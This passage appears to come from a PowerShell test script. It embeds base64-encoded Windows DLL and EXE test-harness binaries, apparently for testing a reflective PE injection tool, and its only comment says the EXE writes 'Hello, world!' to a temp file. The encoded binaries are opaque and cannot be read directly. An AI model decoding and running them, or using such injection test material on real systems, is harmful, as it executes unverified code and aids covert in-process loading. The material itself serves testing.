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'\n\t$Encoded32BitVoidDll = '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'\n\n\t# A bare bones test harness EXE that simply writes \"Hello, world! (EXE ARGS)\" to %TEMP%\\testoutput.txt\n\t$Encoded64BitExe = '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AAAAAEwmAAAAAAAAPCYAAAAAAACsJgAAAAAAAAAAAAAAAAAANiUAAAAAAABAJQAAAAAAAFYlAAAAAAAAaiUAAAAAAAB4JQAAAAAAAC4lAAAAAAAAnCUAAAAAAACoJQAAAAAAALIlAAAAAAAAviUAAAAAAADSJQAAAAAAAAQmAAAAAAAADCYAAAAAAAAWJgAAAAAAACQmAAAAAAAAMiYAAAAAAAAmJQAAAAAAABQlAAAAAAAABCUAAAAAAAD2JAAAAAAAAOgkAAAAAAAAhCUAAAAAAAAAAAAAAAAAAIgAQ3JlYXRlRmlsZUEAIgFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBADQFV3JpdGVGaWxlAEwCR2V0UHJvY0FkZHJlc3MAABsCR2V0TW9kdWxlSGFuZGxlQQAAUgBDbG9zZUhhbmRsZQBLRVJORUwzMi5kbGwAAFgBX1hjcHRGaWx0ZXIA8gFfYW1zZ19leGl0AACnAV9fZ2V0bWFpbmFyZ3MAzgFfX3NldF9hcHBfdHlwZQAAGAZleGl0AABYAl9leGl0AAoCX2NleGl0AAAaAl9jb25maWd0aHJlYWRsb2NhbGUA0AFfX3NldHVzZXJtYXRoZXJyAADiAl9pbml0dGVybV9lAOECX2luaXR0ZXJtAFwBX19DX3NwZWNpZmljX2hhbmRsZXIAAKgBX19pbml0ZW52AHgCX2Ztb2RlAAAZAl9jb21tb2RlAAAzAT90ZXJtaW5hdGVAQFlBWFhaAJkBX19jcnRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAE1TVkNSMTIwLmRsbAAAWwNfbG9jawDHBF91bmxvY2sACQJfY2FsbG9jX2NydACfAV9fZGxsb25leGl0AAIEX29uZXhpdADuAEVuY29kZVBvaW50ZXIAqQNRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgDHAUdldEN1cnJlbnRQcm9jZXNzSWQAywFHZXRDdXJyZW50VGhyZWFkSWQAAIACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAywBEZWNvZGVQb2ludGVyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD+/////////wAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAJgQAABAIgAAmBAAAHwRAABQIgAAfBEAAIwRAABoIgAAjBEAAFoSAAB4IgAAXBIAAL8SAACAIgAAwBIAADAUAACIIgAAMBQAAEIUAAB4IgAARBQAAHwUAAB4IgAAfBQAAJMUAAB4IgAA8BQAAD0VAACoIgAAcBUAABwWAADMIgAAIBYAAG4WAAAAIwAAcBYAACAXAADYIgAAIBcAADcXAAB4IgAAOBcAAHAXAAAIIwAAcBcAAKgXAAAIIwAA4BcAAP4XAAD4IgAAABgAACAYAAD4IgAAIBgAADsYAAD4IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACihQKFIoVChCKIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='\n\t$Encoded32BitExe = 